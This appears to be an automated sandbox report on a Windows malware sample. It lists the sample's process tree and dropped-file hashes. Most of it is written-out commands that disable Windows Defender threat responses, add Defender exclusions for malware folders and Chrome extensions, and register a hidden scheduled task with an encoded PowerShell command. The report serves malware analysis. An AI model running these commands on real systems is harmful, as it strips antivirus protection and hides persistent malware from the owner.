                                                                                                    • C:\Users\Admin\AppData\Local\Temp\PPoGfHUEJWMQlhdih\STqvVSINdDxWlBS\LmzpPZS.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\PPoGfHUEJWMQlhdih\STqvVSINdDxWlBS\LmzpPZS.exe Lc /XFsite_idwha 385118 /S
                                                                                                      1⤵
                                                                                                        PID:1336
                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
                                                                                                          2⤵
                                                                                                            PID:3012
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                              3⤵
                                                                                                                PID:4156
                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                                                                                                3⤵
                                                                                                                  PID:2192
                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
                                                                                                                  3⤵
                                                                                                                    PID:4404
                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
                                                                                                                    3⤵
                                                                                                                      PID:4532
                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
                                                                                                                      3⤵
                                                                                                                        PID:4752
                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
                                                                                                                        3⤵
                                                                                                                          PID:3340
                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                                                                          3⤵
                                                                                                                            PID:2824
                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                                                                                            3⤵
                                                                                                                              PID:4184
                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                                                                              3⤵
                                                                                                                                PID:3444
                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                                                                                3⤵
                                                                                                                                  PID:2496
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                                                                                  3⤵
                                                                                                                                    PID:1392
                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                                                                                    3⤵
                                                                                                                                      PID:2328
                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                                                                                                      3⤵
                                                                                                                                        PID:4500
                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                                                                                                        3⤵
                                                                                                                                          PID:428
                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                                                                                                          3⤵
                                                                                                                                            PID:4200
                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                                                                                                            3⤵
                                                                                                                                              PID:4128
                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                                                                                                              3⤵
                                                                                                                                                PID:3356
                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                                                                                                                3⤵
                                                                                                                                                  PID:2968
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                                                                                                                  3⤵
                                                                                                                                                    PID:4304
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                                                                                                                    3⤵
                                                                                                                                                      PID:2708
                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                                                                                                                                      3⤵
                                                                                                                                                        PID:4412
                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                                                                                                                                        3⤵
                                                                                                                                                          PID:4988
                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                                                                                                                                          3⤵
                                                                                                                                                            PID:4684
                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                                                                                                                                            3⤵
                                                                                                                                                              PID:204
                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                                                                                                                                              3⤵
                                                                                                                                                                PID:4416
                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:4892
                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:2420
                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:1576
                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AplGwAcKU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AplGwAcKU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KpccCTQHFwdaQGGjlLR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KpccCTQHFwdaQGGjlLR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\TewsSzADpkOsC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\TewsSzADpkOsC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZmXCVzpeviUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZmXCVzpeviUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hzVOasbgcFlU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hzVOasbgcFlU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\cAagwmwWSSyWmtVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\cAagwmwWSSyWmtVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\PPoGfHUEJWMQlhdih\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\PPoGfHUEJWMQlhdih\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\tisqMnSmFJrmHkYA\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\tisqMnSmFJrmHkYA\" /t REG_DWORD /d 0 /reg:64;"
                                                                                                                                                                    2⤵
                                                                                                                                                                      PID:4420
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AplGwAcKU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:4660
                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AplGwAcKU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                            4⤵
                                                                                                                                                                              PID:4628
                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZmXCVzpeviUn" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:4876
                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\PPoGfHUEJWMQlhdih /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:4424
                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\tisqMnSmFJrmHkYA /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                3⤵
                                                                                                                                                                                  PID:3180
                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\tisqMnSmFJrmHkYA /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:3052
                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\PPoGfHUEJWMQlhdih /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:4344
                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:1928
                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                        3⤵
                                                                                                                                                                                          PID:2116
                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\cAagwmwWSSyWmtVB /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                          3⤵
                                                                                                                                                                                            PID:2064
                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\cAagwmwWSSyWmtVB /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:4692
                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hzVOasbgcFlU2" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                              3⤵
                                                                                                                                                                                                PID:524
                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hzVOasbgcFlU2" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                  PID:4284
                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZmXCVzpeviUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                    PID:2920
                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TewsSzADpkOsC" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                      PID:4668
                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TewsSzADpkOsC" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                        PID:872
                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KpccCTQHFwdaQGGjlLR" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                          PID:4940
                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KpccCTQHFwdaQGGjlLR" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                            PID:4428
                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AplGwAcKU" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                              PID:2428
                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                            schtasks /run /I /tn "gyadgKEHz"
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                              PID:2944
                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                              schtasks /CREATE /TN "gyadgKEHz" /SC once /ST 18:14:07 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                                                                              PID:4404
                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                              PID:2988
                                                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                                                              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                PID:224

                                                                                                                                                                                                              Network

                                                                                                                                                                                                              MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                              Replay Monitor

                                                                                                                                                                                                              Loading Replay Monitor...

                                                                                                                                                                                                              Downloads

                                                                                                                                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                1bfe591a4fe3d91b03cdf26eaacd8f89

                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                719c37c320f518ac168c86723724891950911cea

                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                9cf94355051bf0f4a45724ca20d1cc02f76371b963ab7d1e38bd8997737b13d8

                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                02f88da4b610678c31664609bcfa9d61db8d0b0617649981af948f670f41a6207b4ec19fecce7385a24e0c609cbbf3f2b79a8acaf09a03c2c432cc4dce75e9db

                                                                                                                                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                338B

                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                03161d6eee9a48773b2e12c94a84a2c2

                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                1edc7da33236264c9eee860f29d57f83411f3939

                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                727ccfcc14d8aacada7d6a2ff8f46eb55c224fc966d1807f700e282239717dce

                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                fe9095668384ba3c5ee712d93f1c4b0035d7022243a5b31393f8e79e408e56f8cde5bb6a3a95f4c1b9821862dc705fd09a6b5e69c1a6df194e3f87943be7438f

                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log

                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                3KB

                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                f6c90ab0db80c6c3ea92556fda7273c7

                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                01d3866b1887cbb0abe9701f6b49c5dbc66a7dfa

                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                a823c3b6f157c50315251d43db740ad37a736b967f0500e024e3a0f84192b269

